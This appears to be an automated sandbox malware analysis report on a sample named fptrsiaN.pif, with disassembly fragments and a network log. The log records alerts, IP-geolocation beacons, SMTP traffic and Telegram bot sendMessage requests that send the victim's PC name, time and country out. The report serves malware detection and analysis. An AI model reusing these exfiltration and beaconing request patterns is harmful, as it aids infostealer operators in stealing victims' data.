          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C74BD6h10_2_25C74908
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C78700h10_2_25C78408
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7B208h10_2_25C7AF10
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C72BE6h10_2_25C72918
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7DD10h10_2_25C7DA18
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C76F18h10_2_25C76C20
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C79A20h10_2_25C79728
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7C528h10_2_25C7C230
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C73506h10_2_25C73238
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25C7F030h10_2_25C7ED38
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25CB1190h10_2_25CB0E98
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25CB0CC8h10_2_25CB09D0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25CB0800h10_2_25CB0508
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then jmp 25CB0338h10_2_25CB0040
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then push 00000000h10_2_25CD47AF
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_25CD0040
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_25CD0037
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_25CD0356
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]10_2_26394C9C

          Networking

          barindex
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49756 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49784 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49792 -> 149.154.167.220:443
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 46.151.208.21:587
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2019/02/2025%20/%2002:40:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2019/02/2025%20/%2002:58:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2019/02/2025%20/%2004:09:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewASN Name: NASHIRNET-ASNNASHIRNETASNSA NASHIRNET-ASNNASHIRNETASNSA
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49768 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49757 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49761 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49746 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49760 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49783 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49791 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49769 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49779 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49786 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49782 -> 104.21.32.1:443
          Source: global trafficTCP traffic: 192.168.2.4:49773 -> 46.151.208.21:587
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49732 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49750 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49764 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2019/02/2025%20/%2002:40:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2019/02/2025%20/%2002:58:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2019/02/2025%20/%2004:09:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficDNS traffic detected: DNS query: mail.irco.com.sa
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 19:06:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
